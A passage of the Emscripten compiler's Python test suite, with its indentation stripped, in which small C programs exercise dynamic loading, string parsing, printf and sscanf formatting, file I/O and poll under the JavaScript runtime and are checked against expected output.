self.build(lib_src, dirname, filename)
shutil.move(filename + '.o.js', os.path.join(dirname, 'liblib.so'))
src = r'''
#include <dlfcn.h>
int parent_global = 123;
int main() {
void* lib_handle;
void (*fptr)();
lib_handle = dlopen("liblib.so", RTLD_NOW);
fptr = (void (*)())dlsym(lib_handle, "func");
fptr();
parent_global = 456;
fptr();
return 0;
}
'''
Settings.BUILD_AS_SHARED_LIB = 0
Settings.INCLUDE_FULL_LIBRARY = 1
Settings.EXPORTED_FUNCTIONS = ['_main']
add_pre_run_and_checks = '''
def process(filename):
src = open(filename, 'r').read().replace(
'// {{PRE_RUN_ADDITIONS}}',
"FS.createLazyFile('/', 'liblib.so', 'liblib.so', true, false);"
)
open(filename, 'w').write(src)
'''
self.do_run(src, 'Parent global: 123.*Parent global: 456.*',
output_nicerizer=lambda x, err: x.replace('\n', '*'),
post_build=add_pre_run_and_checks,
extra_emscripten_args=['-H', 'libc/fcntl.h,libc/sys/unistd.h,poll.h,libc/math.h,libc/time.h,libc/langinfo.h'])
Settings.INCLUDE_FULL_LIBRARY = 0
def test_dlfcn_varargs(self):
return self.skip('shared libs are deprecated')
if Settings.ASM_JS: return self.skip('TODO: dlopen in asm')
Settings.LINKABLE = 1
Settings.NAMED_GLOBALS = 1
if Building.LLVM_OPTS == 2: return self.skip('LLVM LTO will optimize things that prevent shared objects from working')
if Settings.QUANTUM_SIZE == 1: return self.skip('FIXME: Add support for this')
lib_src = r'''
void print_ints(int n, ...);
extern "C" void func() {
print_ints(2, 13, 42);
}
'''
dirname = self.get_dir()
filename = os.path.join(dirname, 'liblib.cpp')
Settings.BUILD_AS_SHARED_LIB = 1
Settings.EXPORTED_FUNCTIONS = ['_func']
self.build(lib_src, dirname, filename)
shutil.move(filename + '.o.js', os.path.join(dirname, 'liblib.so'))
src = r'''
#include <stdarg.h>
#include <stdio.h>
#include <dlfcn.h>
void print_ints(int n, ...) {
va_list args;
va_start(args, n);
for (int i = 0; i < n; i++) {
printf("%d\n", va_arg(args, int));
}
va_end(args);
}
int main() {
void* lib_handle;
void (*fptr)();
print_ints(2, 100, 200);
lib_handle = dlopen("liblib.so", RTLD_NOW);
fptr = (void (*)())dlsym(lib_handle, "func");
fptr();
return 0;
}
'''
Settings.BUILD_AS_SHARED_LIB = 0
Settings.EXPORTED_FUNCTIONS = ['_main']
add_pre_run_and_checks = '''
def process(filename):
src = open(filename, 'r').read().replace(
'// {{PRE_RUN_ADDITIONS}}',
"FS.createLazyFile('/', 'liblib.so', 'liblib.so', true, false);"
)
open(filename, 'w').write(src)
'''
self.do_run(src, '100\n200\n13\n42\n',
post_build=add_pre_run_and_checks)
def test_dlfcn_self(self):
if Settings.USE_TYPED_ARRAYS == 1: return self.skip('Does not work with USE_TYPED_ARRAYS=1')
Settings.DLOPEN_SUPPORT = 1
src = r'''
#include <stdio.h>
#include <dlfcn.h>
int global = 123;
extern "C" __attribute__((noinline)) void foo(int x) {
printf("%d\n", x);
}
extern "C" __attribute__((noinline)) void repeatable() {
void* self = dlopen(NULL, RTLD_LAZY);
int* global_ptr = (int*)dlsym(self, "global");
void (*foo_ptr)(int) = (void (*)(int))dlsym(self, "foo");
foo_ptr(*global_ptr);
dlclose(self);
}
int main() {
repeatable();
repeatable();
return 0;
}'''
def post(filename):
with open(filename) as f:
for line in f:
if 'var SYMBOL_TABLE' in line:
table = line
break
else:
raise Exception('Could not find symbol table!')
import json
table = json.loads(table[table.find('{'):table.rfind('}')+1])
actual = list(sorted(table.keys()))
# ensure there aren't too many globals; we don't want unnamed_addr
assert actual == ['_foo', '_global', '_main', '_repeatable'], \
"Symbol table does not match: %s" % actual
self.do_run(src, '123\n123', post_build=(None, post))
def test_rand(self):
return self.skip('rand() is now random') # FIXME
src = r'''
#include <stdio.h>
#include <stdlib.h>
int main() {
printf("%d\n", rand());
printf("%d\n", rand());
srand(123);
printf("%d\n", rand());
printf("%d\n", rand());
srand(123);
printf("%d\n", rand());
printf("%d\n", rand());
unsigned state = 0;
int r;
r = rand_r(&state);
printf("%d, %u\n", r, state);
r = rand_r(&state);
printf("%d, %u\n", r, state);
state = 0;
r = rand_r(&state);
printf("%d, %u\n", r, state);
return 0;
}
'''
expected = '''
1250496027
1116302336
440917656
1476150784
440917656
1476150784
12345, 12345
1406932606, 3554416254
12345, 12345
'''
self.do_run(src, re.sub(r'(^|\n)\s+', r'\1', expected))
def test_strtod(self):
if self.emcc_args is None: return self.skip('needs emcc for libc')
src = r'''
#include <stdio.h>
#include <stdlib.h>
int main() {
char* endptr;
printf("\n");
printf("%g\n", strtod("0", &endptr));
printf("%g\n", strtod("0.", &endptr));
printf("%g\n", strtod("0.0", &endptr));
printf("%g\n", strtod("-0.0", &endptr));
printf("%g\n", strtod("1", &endptr));
printf("%g\n", strtod("1.", &endptr));
printf("%g\n", strtod("1.0", &endptr));
printf("%g\n", strtod("z1.0", &endptr));
printf("%g\n", strtod("0.5", &endptr));
printf("%g\n", strtod(".5", &endptr));
printf("%g\n", strtod(".a5", &endptr));
printf("%g\n", strtod("123", &endptr));
printf("%g\n", strtod("123.456", &endptr));
printf("%g\n", strtod("-123.456", &endptr));
printf("%g\n", strtod("1234567891234567890", &endptr));
printf("%g\n", strtod("1234567891234567890e+50", &endptr));
printf("%g\n", strtod("84e+220", &endptr));
printf("%g\n", strtod("123e-50", &endptr));
printf("%g\n", strtod("123e-250", &endptr));
printf("%g\n", strtod("123e-450", &endptr));
char str[] = " 12.34e56end";
printf("%g\n", strtod(str, &endptr));
printf("%d\n", endptr - str);
printf("%g\n", strtod("84e+420", &endptr));
printf("%.12f\n", strtod("1.2345678900000000e+08", NULL));
return 0;
}
'''
expected = '''
0
0
0
-0
1
1
1
0
0.5
0.5
0
123
123.456
-123.456
1.23457e+18
1.23457e+68
8.4e+221
1.23e-48
1.23e-248
0
1.234e+57
10
inf
123456789.000000000000
'''
self.do_run(src, re.sub(r'\n\s+', '\n', expected))
self.do_run(src.replace('strtod', 'strtold'), re.sub(r'\n\s+', '\n', expected)) # XXX add real support for long double
def test_strtok(self):
src = r'''
#include<stdio.h>
#include<string.h>
int main() {
char test[80], blah[80];
char *sep = "\\/:;=-";
char *word, *phrase, *brkt, *brkb;
strcpy(test, "This;is.a:test:of=the/string\\tokenizer-function.");
for (word = strtok_r(test, sep, &brkt); word; word = strtok_r(NULL, sep, &brkt)) {
strcpy(blah, "blah:blat:blab:blag");
for (phrase = strtok_r(blah, sep, &brkb); phrase; phrase = strtok_r(NULL, sep, &brkb)) {
printf("at %s:%s\n", word, phrase);
}
}
return 0;
}
'''
expected = '''at This:blah
at This:blat
at This:blab
at This:blag
at is.a:blah
at is.a:blat
at is.a:blab
at is.a:blag
at test:blah
at test:blat
at test:blab
at test:blag
at of:blah
at of:blat
at of:blab
at of:blag
at the:blah
at the:blat
at the:blab
at the:blag
at string:blah
at string:blat
at string:blab
at string:blag
at tokenizer:blah
at tokenizer:blat
at tokenizer:blab
at tokenizer:blag
at function.:blah
at function.:blat
at function.:blab
at function.:blag
'''
self.do_run(src, expected)
def test_parseInt(self):
if Settings.USE_TYPED_ARRAYS != 2: return self.skip('i64 mode 1 requires ta2')
if Settings.QUANTUM_SIZE == 1: return self.skip('Q1 and I64_1 do not mix well yet')
src = open(path_from_root('tests', 'parseInt', 'src.c'), 'r').read()
expected = open(path_from_root('tests', 'parseInt', 'output.txt'), 'r').read()
self.do_run(src, expected)
def test_transtrcase(self):
src = '''
#include <stdio.h>
#include <string.h>
int main() {
char szToupr[] = "hello, ";
char szTolwr[] = "EMSCRIPTEN";
strupr(szToupr);
strlwr(szTolwr);
printf(szToupr);
printf(szTolwr);
return 0;
}
'''
self.do_run(src, 'HELLO, emscripten')
def test_printf(self):
if Settings.USE_TYPED_ARRAYS != 2: return self.skip('i64 mode 1 requires ta2')
self.banned_js_engines = [NODE_JS, V8_ENGINE] # SpiderMonkey and V8 do different things to float64 typed arrays, un-NaNing, etc.
src = open(path_from_root('tests', 'printf', 'test.c'), 'r').read()
expected = [open(path_from_root('tests', 'printf', 'output.txt'), 'r').read(),
open(path_from_root('tests', 'printf', 'output_i64_1.txt'), 'r').read()]
self.do_run(src, expected)
def test_printf_2(self):
src = r'''
#include <stdio.h>
int main() {
char c = '1';
short s = 2;
int i = 3;
long long l = 4;
float f = 5.5;
double d = 6.6;
printf("%c,%hd,%d,%lld,%.1f,%.1llf\n", c, s, i, l, f, d);
printf("%#x,%#x\n", 1, 0);
return 0;
}
'''
self.do_run(src, '1,2,3,4,5.5,6.6\n0x1,0\n')
def test_vprintf(self):
src = r'''
#include <stdio.h>
#include <stdarg.h>
void print(char* format, ...) {
va_list args;
va_start (args, format);
vprintf (format, args);
va_end (args);
}
int main () {
print("Call with %d variable argument.\n", 1);
print("Call with %d variable %s.\n", 2, "arguments");
return 0;
}
'''
expected = '''
Call with 1 variable argument.
Call with 2 variable arguments.
'''
self.do_run(src, re.sub('(^|\n)\s+', '\\1', expected))
def test_vsnprintf(self):
if self.emcc_args is None: return self.skip('needs i64 math')
src = r'''
#include <stdio.h>
#include <stdarg.h>
#include <stdint.h>
void printy(const char *f, ...)
{
char buffer[256];
va_list args;
va_start(args, f);
vsnprintf(buffer, 256, f, args);
puts(buffer);
va_end(args);
}
int main(int argc, char **argv) {
int64_t x = argc - 1;
int64_t y = argc - 1 + 0x400000;
if (x % 3 == 2) y *= 2;
printy("0x%llx_0x%llx", x, y);
printy("0x%llx_0x%llx", x, x);
printy("0x%llx_0x%llx", y, x);
printy("0x%llx_0x%llx", y, y);
{
uint64_t A = 0x800000;
uint64_t B = 0x800000000000ULL;
printy("0x%llx_0x%llx", A, B);
}
{
uint64_t A = 0x800;
uint64_t B = 0x12340000000000ULL;
printy("0x%llx_0x%llx", A, B);
}
{
uint64_t A = 0x000009182746756;
uint64_t B = 0x192837465631ACBDULL;
printy("0x%llx_0x%llx", A, B);
}
return 0;
}
'''
self.do_run(src, '''0x0_0x400000
0x0_0x0
0x400000_0x0
0x400000_0x400000
0x800000_0x800000000000
0x800_0x12340000000000
0x9182746756_0x192837465631acbd
''')
def test_printf_more(self):
src = r'''
#include <stdio.h>
int main() {
int size = snprintf(NULL, 0, "%s %d %.2f\n", "me and myself", 25, 1.345);
char buf[size];
snprintf(buf, size, "%s %d %.2f\n", "me and myself", 25, 1.345);
printf("%d : %s\n", size, buf);
char *buff = NULL;
asprintf(&buff, "%d waka %d\n", 21, 95);
puts(buff);
return 0;
}
'''
self.do_run(src, '22 : me and myself 25 1.34\n21 waka 95\n')
def test_perrar(self):
src = r'''
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <stdio.h>
int main( int argc, char** argv ){
int retval = open( "NonExistingFile", O_RDONLY );
if( retval == -1 )
perror( "Cannot open NonExistingFile" );
return 0;
}
'''
self.do_run(src, 'Cannot open NonExistingFile: No such file or directory\n')
def test_atoX(self):
if self.emcc_args is None: return self.skip('requires ta2')
src = r'''
#include <stdio.h>
#include <stdlib.h>
int main () {
printf("%d*", atoi(""));
printf("%d*", atoi("a"));
printf("%d*", atoi(" b"));
printf("%d*", atoi(" c "));
printf("%d*", atoi("6"));
printf("%d*", atoi(" 5"));
printf("%d*", atoi("4 "));
printf("%d*", atoi("3 6"));
printf("%d*", atoi(" 3 7"));
printf("%d*", atoi("9 d"));
printf("%d\n", atoi(" 8 e"));
printf("%d*", atol(""));
printf("%d*", atol("a"));
printf("%d*", atol(" b"));
printf("%d*", atol(" c "));
printf("%d*", atol("6"));
printf("%d*", atol(" 5"));
printf("%d*", atol("4 "));
printf("%d*", atol("3 6"));
printf("%d*", atol(" 3 7"));
printf("%d*", atol("9 d"));
printf("%d\n", atol(" 8 e"));
printf("%lld*", atoll("6294967296"));
printf("%lld*", atoll(""));
printf("%lld*", atoll("a"));
printf("%lld*", atoll(" b"));
printf("%lld*", atoll(" c "));
printf("%lld*", atoll("6"));
printf("%lld*", atoll(" 5"));
printf("%lld*", atoll("4 "));
printf("%lld*", atoll("3 6"));
printf("%lld*", atoll(" 3 7"));
printf("%lld*", atoll("9 d"));
printf("%lld\n", atoll(" 8 e"));
return 0;
}
'''
self.do_run(src, '0*0*0*0*6*5*4*3*3*9*8\n0*0*0*0*6*5*4*3*3*9*8\n6294967296*0*0*0*0*6*5*4*3*3*9*8\n')
def test_strstr(self):
src = r'''
#include <stdio.h>
#include <string.h>
int main()
{
printf("%d\n", !!strstr("\\n", "\\n"));
printf("%d\n", !!strstr("cheezy", "ez"));
printf("%d\n", !!strstr("cheeezy", "ez"));
printf("%d\n", !!strstr("cheeeeeeeeeezy", "ez"));
printf("%d\n", !!strstr("cheeeeeeeeee1zy", "ez"));
printf("%d\n", !!strstr("che1ezy", "ez"));
printf("%d\n", !!strstr("che1ezy", "che"));
printf("%d\n", !!strstr("ce1ezy", "che"));
printf("%d\n", !!strstr("ce1ezy", "ezy"));
printf("%d\n", !!strstr("ce1ezyt", "ezy"));
printf("%d\n", !!strstr("ce1ez1y", "ezy"));
printf("%d\n", !!strstr("cheezy", "a"));
printf("%d\n", !!strstr("cheezy", "b"));
printf("%d\n", !!strstr("cheezy", "c"));
printf("%d\n", !!strstr("cheezy", "d"));
printf("%d\n", !!strstr("cheezy", "g"));
printf("%d\n", !!strstr("cheezy", "h"));
printf("%d\n", !!strstr("cheezy", "i"));
printf("%d\n", !!strstr("cheezy", "e"));
printf("%d\n", !!strstr("cheezy", "x"));
printf("%d\n", !!strstr("cheezy", "y"));
printf("%d\n", !!strstr("cheezy", "z"));
printf("%d\n", !!strstr("cheezy", "_"));
const char *str = "a big string";
printf("%d\n", strstr(str, "big") - str);
return 0;
}
'''
self.do_run(src, '''1
1
1
1
0
1
1
0
1
1
0
0
0
1
0
0
1
0
1
0
1
1
0
2
''')
def test_sscanf(self):
if self.emcc_args is None: return self.skip('needs emcc for libc')
src = r'''
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int main () {
#define CHECK(str) \
{ \
char name[1000]; \
memset(name, 0, 1000); \
int prio = 99; \
sscanf(str, "%s %d", name, &prio); \
printf("%s : %d\n", name, prio); \
}
CHECK("en-us 2");
CHECK("en-r");
CHECK("en 3");
printf("%f, %f\n", atof("1.234567"), atof("cheez"));
char float_formats[] = "fegE";
char format[] = "%_";
for(int i = 0; i < 4; ++i) {
format[1] = float_formats[i];
float n = -1;
sscanf(" 2.8208", format, &n);
printf("%.4f\n", n);
float a = -1;
sscanf("-3.03", format, &a);
printf("%.4f\n", a);
}
char buffy[100];
sscanf("cheez some thing moar 123\nyet more\n", "cheez %s", buffy);
printf("|%s|\n", buffy);
sscanf("cheez something\nmoar 123\nyet more\n", "cheez %s", buffy);
printf("|%s|\n", buffy);
sscanf("cheez somethingmoar\tyet more\n", "cheez %s", buffy);
printf("|%s|\n", buffy);
int numverts = -1;
printf("%d\n", sscanf(" numverts 1499\n", " numverts %d", &numverts)); // white space is the same, even if tab vs space
printf("%d\n", numverts);
int index;
float u, v;
short start, count;
printf("%d\n", sscanf(" vert 87 ( 0.481565 0.059481 ) 0 1\n", " vert %d ( %f %f ) %hu %hu", &index, &u, &v, &start, &count));
printf("%d,%.6f,%.6f,%hu,%hu\n", index, u, v, start, count);
int neg, neg2, neg3 = 0;
printf("%d\n", sscanf("-123 -765 -34-6", "%d %u %d", &neg, &neg2, &neg3));
printf("%d,%u,%d\n", neg, neg2, neg3);
{
int a = 0;
sscanf("1", "%i", &a);
printf("%i\n", a);
}
return 0;
}
'''
self.do_run(src, 'en-us : 2\nen-r : 99\nen : 3\n1.234567, 0.000000\n2.8208\n-3.0300\n2.8208\n-3.0300\n2.8208\n-3.0300\n2.8208\n-3.0300\n|some|\n|something|\n|somethingmoar|\n' +
'1\n1499\n' +
'5\n87,0.481565,0.059481,0,1\n' +
'3\n-123,4294966531,-34\n' +
'1\n')
def test_sscanf_2(self):
# doubles
if Settings.USE_TYPED_ARRAYS == 2:
for ftype in ['float', 'double']:
src = r'''
#include <stdio.h>
int main(){
char strval1[] = "1.2345678901";
char strval2[] = "1.23456789e5";
char strval3[] = "1.23456789E5";
char strval4[] = "1.2345678e-5";
char strval5[] = "1.2345678E-5";
double dblval = 1.2345678901;
double tstval;
sscanf(strval1, "%lf", &tstval);
if(dblval != tstval) printf("FAIL: Values are not equal: %lf %lf\n", dblval, tstval);
else printf("Pass: %lf %lf\n", tstval, dblval);
sscanf(strval2, "%lf", &tstval);
dblval = 123456.789;
if(dblval != tstval) printf("FAIL: Values are not equal: %lf %lf\n", dblval, tstval);
else printf("Pass: %lf %lf\n", tstval, dblval);
sscanf(strval3, "%lf", &tstval);
dblval = 123456.789;
if(dblval != tstval) printf("FAIL: Values are not equal: %lf %lf\n", dblval, tstval);
else printf("Pass: %lf %lf\n", tstval, dblval);
sscanf(strval4, "%lf", &tstval);
dblval = 0.000012345678;
if(dblval != tstval) printf("FAIL: Values are not equal: %lf %lf\n", dblval, tstval);
else printf("Pass: %lf %lf\n", tstval, dblval);
sscanf(strval5, "%lf", &tstval);
dblval = 0.000012345678;
if(dblval != tstval) printf("FAIL: Values are not equal: %lf %lf\n", dblval, tstval);
else printf("Pass: %lf %lf\n", tstval, dblval);
return 0;
}
'''
if ftype == 'float':
self.do_run(src.replace('%lf', '%f').replace('double', 'float'), '''Pass: 1.234568 1.234568
Pass: 123456.789063 123456.789063
Pass: 123456.789063 123456.789063
Pass: 0.000012 0.000012
Pass: 0.000012 0.000012''')
else:
self.do_run(src, '''Pass: 1.234568 1.234568
Pass: 123456.789000 123456.789000
Pass: 123456.789000 123456.789000
Pass: 0.000012 0.000012
Pass: 0.000012 0.000012''')
def test_sscanf_n(self):
src = r'''
#include<stdio.h>
int main() {
char *line = "version 1.0";
int i, l, lineno;
char word[80];
if (sscanf(line, "%s%n", word, &l) != 1) {
printf("Header format error, line %d\n", lineno);
}
printf("[DEBUG] word 1: %s, l: %d\n", word, l);
int x = sscanf("one %n two", "%s %n", word, &l);
printf("%d,%s,%d\n", x, word, l);
{
int a, b, c, count;
count = sscanf("12345 6789", "%d %n%d", &a, &b, &c);
printf("%i %i %i %i\n", count, a, b, c);
}
return 0;
}
'''
self.do_run(src, '''[DEBUG] word 1: version, l: 7\n1,one,4\n2 12345 6 6789\n''')
def test_sscanf_whitespace(self):
src = r'''
#include<stdio.h>
int main() {
short int x;
short int y;
const char* buffer[] = {
"173,16",
" 16,173",
"183, 173",
" 17, 287",
" 98, 123, "
};
for (int i=0; i<5; ++i) {
sscanf(buffer[i], "%hd,%hd", &x, &y);
printf("%d:%d,%d ", i, x, y);
}
return 0;
}
'''
self.do_run(src, '''0:173,16 1:16,173 2:183,173 3:17,287 4:98,123''')
def test_sscanf_other_whitespace(self):
Settings.SAFE_HEAP = 0 # use i16s in printf
src = r'''
#include<stdio.h>
int main() {
short int x;
short int y;
const char* buffer[] = {
"\t2\t3\t", /* TAB - horizontal tab */
"\t\t5\t\t7\t\t",
"\n11\n13\n", /* LF - line feed */
"\n\n17\n\n19\n\n",
"\v23\v29\v", /* VT - vertical tab */
"\v\v31\v\v37\v\v",
"\f41\f43\f", /* FF - form feed */
"\f\f47\f\f53\f\f",
"\r59\r61\r", /* CR - carrage return */
"\r\r67\r\r71\r\r"
};
for (int i=0; i<10; ++i) {
x = 0; y = 0;
sscanf(buffer[i], " %d %d ", &x, &y);
printf("%d, %d, ", x, y);
}
return 0;
}
'''
self.do_run(src, '''2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53, 59, 61, 67, 71, ''')
def test_sscanf_3(self):
# i64
if not Settings.USE_TYPED_ARRAYS == 2: return self.skip('64-bit sscanf only supported in ta2')
src = r'''
#include <stdint.h>
#include <stdio.h>
int main(){
int64_t s, m, l;
printf("%d\n", sscanf("123 1073741823 1125899906842620", "%lld %lld %lld", &s, &m, &l));
printf("%lld,%lld,%lld\n", s, m, l);
int64_t negS, negM, negL;
printf("%d\n", sscanf("-123 -1073741823 -1125899906842620", "%lld %lld %lld", &negS, &negM, &negL));
printf("%lld,%lld,%lld\n", negS, negM, negL);
return 0;
}
'''
self.do_run(src, '3\n123,1073741823,1125899906842620\n' +
'3\n-123,-1073741823,-1125899906842620\n')
def test_sscanf_4(self):
src = r'''
#include <stdio.h>
int main()
{
char pYear[16], pMonth[16], pDay[16], pDate[64];
printf("%d\n", sscanf("Nov 19 2012", "%s%s%s", pMonth, pDay, pYear));
printf("day %s, month %s, year %s \n", pDay, pMonth, pYear);
return(0);
}
'''
self.do_run(src, '3\nday 19, month Nov, year 2012');
def test_sscanf_5(self):
src = r'''
#include "stdio.h"
static const char *colors[] = {
" c black",
". c #001100",
"X c #111100"
};
int main(){
unsigned char code;
char color[32];
int rcode;
for(int i = 0; i < 3; i++) {
rcode = sscanf(colors[i], "%c c %s", &code, color);
printf("%i, %c, %s\n", rcode, code, color);
}
}
'''
self.do_run(src, '2, , black\n2, ., #001100\n2, X, #111100');
def test_sscanf_skip(self):
if Settings.USE_TYPED_ARRAYS != 2: return self.skip("need ta2 for full i64")
src = r'''
#include <stdint.h>
#include <stdio.h>
int main(){
int val1;
printf("%d\n", sscanf("10 20 30 40", "%*lld %*d %d", &val1));
printf("%d\n", val1);
int64_t large, val2;
printf("%d\n", sscanf("1000000 -1125899906842620 -123 -1073741823", "%lld %*lld %ld %*d", &large, &val2));
printf("%lld,%d\n", large, val2);
return 0;
}
'''
self.do_run(src, '1\n30\n2\n1000000,-123\n')
def test_sscanf_caps(self):
src = r'''
#include "stdio.h"
int main(){
unsigned int a;
float e, f, g;
sscanf("a 1.1 1.1 1.1", "%X %E %F %G", &a, &e, &f, &g);
printf("%d %.1F %.1F %.1F\n", a, e, f, g);
}
'''
self.do_run(src, '10 1.1 1.1 1.1');
def test_langinfo(self):
src = open(path_from_root('tests', 'langinfo', 'test.c'), 'r').read()
expected = open(path_from_root('tests', 'langinfo', 'output.txt'), 'r').read()
self.do_run(src, expected, extra_emscripten_args=['-H', 'libc/langinfo.h'])
def test_files(self):
if self.emcc_args is not None and '-O2' in self.emcc_args:
self.emcc_args += ['--closure', '1'] # Use closure here, to test we don't break FS stuff
Settings.CORRECT_SIGNS = 1 # Just so our output is what we expect. Can flip them both.
post = '''
def process(filename):
src = \'\'\'
var Module = {
'noFSInit': true,
'preRun': function() {
FS.createLazyFile('/', 'test.file', 'test.file', true, false);
// Test FS_* exporting
Module['FS_createDataFile']('/', 'somefile.binary', [100, 200, 50, 25, 10, 77, 123], true, false); // 200 becomes -56, since signed chars are used in memory
var test_files_input = 'hi there!';
var test_files_input_index = 0;
FS.init(function() {
return test_files_input.charCodeAt(test_files_input_index++) || null;
});
}
};
\'\'\' + open(filename, 'r').read()
open(filename, 'w').write(src)
'''
other = open(os.path.join(self.get_dir(), 'test.file'), 'w')
other.write('some data');
other.close()
src = open(path_from_root('tests', 'files.cpp'), 'r').read()
self.do_run(src, 'size: 7\ndata: 100,-56,50,25,10,77,123\nloop: 100 -56 50 25 10 77 123 \ninput:hi there!\ntexto\ntexte\n$\n5 : 10,30,20,11,88\nother=some data.\nseeked=me da.\nseeked=ata.\nseeked=ta.\nfscanfed: 10 - hello\nok.\n',
post_build=post, extra_emscripten_args=['-H', 'libc/fcntl.h'])
def test_files_m(self):
# Test for Module.stdin etc.
Settings.CORRECT_SIGNS = 1
post = '''
def process(filename):
src = \'\'\'
var data = [10, 20, 40, 30];
var Module = {
stdin: function() { return data.pop() || null },
stdout: function(x) { Module.print('got: ' + x) }
};
\'\'\' + open(filename, 'r').read()
open(filename, 'w').write(src)
'''
src = r'''
#include <stdio.h>
#include <unistd.h>
int main () {
char c;
fprintf(stderr, "isatty? %d,%d,%d\n", isatty(fileno(stdin)), isatty(fileno(stdout)), isatty(fileno(stderr)));
while ((c = fgetc(stdin)) != EOF) {
putc(c+5, stdout);
}
return 0;
}
'''
self.do_run(src, 'isatty? 0,0,1\ngot: 35\ngot: 45\ngot: 25\ngot: 15\n', post_build=post)
def test_fwrite_0(self):
src = r'''
#include <stdio.h>
#include <stdlib.h>
int main ()
{
FILE *fh;
fh = fopen("a.txt", "wb");
if (!fh) exit(1);
fclose(fh);
fh = fopen("a.txt", "rb");
if (!fh) exit(1);
char data[] = "foobar";
size_t written = fwrite(data, 1, sizeof(data), fh);
printf("written=%zu\n", written);
}
'''
self.do_run(src, 'written=0')
def test_fgetc_unsigned(self):
if self.emcc_args is None: return self.skip('requires emcc')
src = r'''
#include <stdio.h>
int main() {
FILE *file = fopen("file_with_byte_234.txt", "rb");
int c = fgetc(file);
printf("*%d\n", c);
}
'''
open('file_with_byte_234.txt', 'wb').write('\xea')
self.emcc_args += ['--embed-file', 'file_with_byte_234.txt']
self.do_run(src, '*234\n')
def test_fgets_eol(self):
if self.emcc_args is None: return self.skip('requires emcc')
src = r'''
#include <stdio.h>
char buf[32];
int main()
{
char *r = "SUCCESS";
FILE *f = fopen("eol.txt", "r");
while (fgets(buf, 32, f) != NULL) {
if (buf[0] == '\0') {
r = "FAIL";
break;
}
}
printf("%s\n", r);
fclose(f);
return 0;
}
'''
open('eol.txt', 'wb').write('\n')
self.emcc_args += ['--embed-file', 'eol.txt']
self.do_run(src, 'SUCCESS\n')
def test_fscanf(self):
if self.emcc_args is None: return self.skip('requires emcc')
open(os.path.join(self.get_dir(), 'three_numbers.txt'), 'w').write('''-1 0.1 -.1''')
src = r'''
#include <stdio.h>
#include <assert.h>
#include <float.h>
int main()
{
float x = FLT_MAX, y = FLT_MAX, z = FLT_MAX;
FILE* fp = fopen("three_numbers.txt", "r");
if (fp) {
int match = fscanf(fp, " %f %f %f ", &x, &y, &z);
printf("match = %d\n", match);
printf("x = %0.1f, y = %0.1f, z = %0.1f\n", x, y, z);
} else {
printf("failed to open three_numbers.txt\n");
}
return 0;
}
'''
self.emcc_args += ['--embed-file', 'three_numbers.txt']
self.do_run(src, 'match = 3\nx = -1.0, y = 0.1, z = -0.1\n')
def test_readdir(self):
src = open(path_from_root('tests', 'dirent', 'test_readdir.c'), 'r').read()
self.do_run(src, 'success', force_c=True)
def test_stat(self):
add_pre_run = '''
def process(filename):
src = open(filename, 'r').read().replace(
'// {{PRE_RUN_ADDITIONS}}',
\'\'\'
var f1 = FS.createFolder('/', 'test', true, true);
var f2 = FS.createDataFile(f1, 'file', 'abcdef', true, true);
var f3 = FS.createLink(f1, 'link', 'file', true, true);
var f4 = FS.createDevice(f1, 'device', function(){}, function(){});
f1.timestamp = f2.timestamp = f3.timestamp = f4.timestamp = new Date(1200000000000);
\'\'\'
)
open(filename, 'w').write(src)
'''
src = open(path_from_root('tests', 'stat', 'src.c'), 'r').read()
expected = open(path_from_root('tests', 'stat', 'output.txt'), 'r').read()
self.do_run(src, expected, post_build=add_pre_run, extra_emscripten_args=['-H', 'libc/fcntl.h'])
def test_fcntl(self):
add_pre_run = '''
def process(filename):
src = open(filename, 'r').read().replace(
'// {{PRE_RUN_ADDITIONS}}',
"FS.createDataFile('/', 'test', 'abcdef', true, true);"
)
open(filename, 'w').write(src)
'''
src = open(path_from_root('tests', 'fcntl', 'src.c'), 'r').read()
expected = open(path_from_root('tests', 'fcntl', 'output.txt'), 'r').read()
self.do_run(src, expected, post_build=add_pre_run, extra_emscripten_args=['-H', 'libc/fcntl.h'])
def test_fcntl_open(self):
src = open(path_from_root('tests', 'fcntl-open', 'src.c'), 'r').read()
expected = open(path_from_root('tests', 'fcntl-open', 'output.txt'), 'r').read()
self.do_run(src, expected, force_c=True, extra_emscripten_args=['-H', 'libc/fcntl.h'])
def test_fcntl_misc(self):
add_pre_run = '''
def process(filename):
src = open(filename, 'r').read().replace(
'// {{PRE_RUN_ADDITIONS}}',
"FS.createDataFile('/', 'test', 'abcdef', true, true);"
)
open(filename, 'w').write(src)
'''
src = open(path_from_root('tests', 'fcntl-misc', 'src.c'), 'r').read()
expected = open(path_from_root('tests', 'fcntl-misc', 'output.txt'), 'r').read()
self.do_run(src, expected, post_build=add_pre_run, extra_emscripten_args=['-H', 'libc/fcntl.h'])
def test_poll(self):
add_pre_run = '''
def process(filename):
src = open(filename, 'r').read().replace(
'// {{PRE_RUN_ADDITIONS}}',
\'\'\'
FS.createDataFile('/', 'file', 'abcdef', true, true);
FS.createDevice('/', 'device', function() {}, function() {});
\'\'\'
)
open(filename, 'w').write(src)
'''
src = r'''
#include <stdio.h>
#include <errno.h>
#include <fcntl.h>
#include <poll.h>
int main() {
struct pollfd multi[5];
multi[0].fd = open("/file", O_RDONLY, 0777);
multi[1].fd = open("/device", O_RDONLY, 0777);
multi[2].fd = 123;
multi[3].fd = open("/file", O_RDONLY, 0777);
multi[4].fd = open("/file", O_RDONLY, 0777);
multi[0].events = POLLIN | POLLOUT | POLLNVAL | POLLERR;
multi[1].events = POLLIN | POLLOUT | POLLNVAL | POLLERR;
multi[2].events = POLLIN | POLLOUT | POLLNVAL | POLLERR;
multi[3].events = 0x00;
multi[4].events = POLLOUT | POLLNVAL | POLLERR;
printf("ret: %d\n", poll(multi, 5, 123));
printf("errno: %d\n", errno);
printf("multi[0].revents: %d\n", multi[0].revents == (POLLIN | POLLOUT));
printf("multi[1].revents: %d\n", multi[1].revents == (POLLIN | POLLOUT));
printf("multi[2].revents: %d\n", multi[2].revents == POLLNVAL);
printf("multi[3].revents: %d\n", multi[3].revents == 0);
printf("multi[4].revents: %d\n", multi[4].revents == POLLOUT);
return 0;
}
'''
expected = r'''
ret: 4
errno: 0
multi[0].revents: 1
multi[1].revents: 1
multi[2].revents: 1
multi[3].revents: 1
multi[4].revents: 1
'''
self.do_run(src, re.sub('(^|\n)\s+', '\\1', expected), post_build=add_pre_run, extra_emscripten_args=['-H', 'libc/fcntl.h,poll.h'])
def test_statvfs(self):
src = r'''
#include <stdio.h>
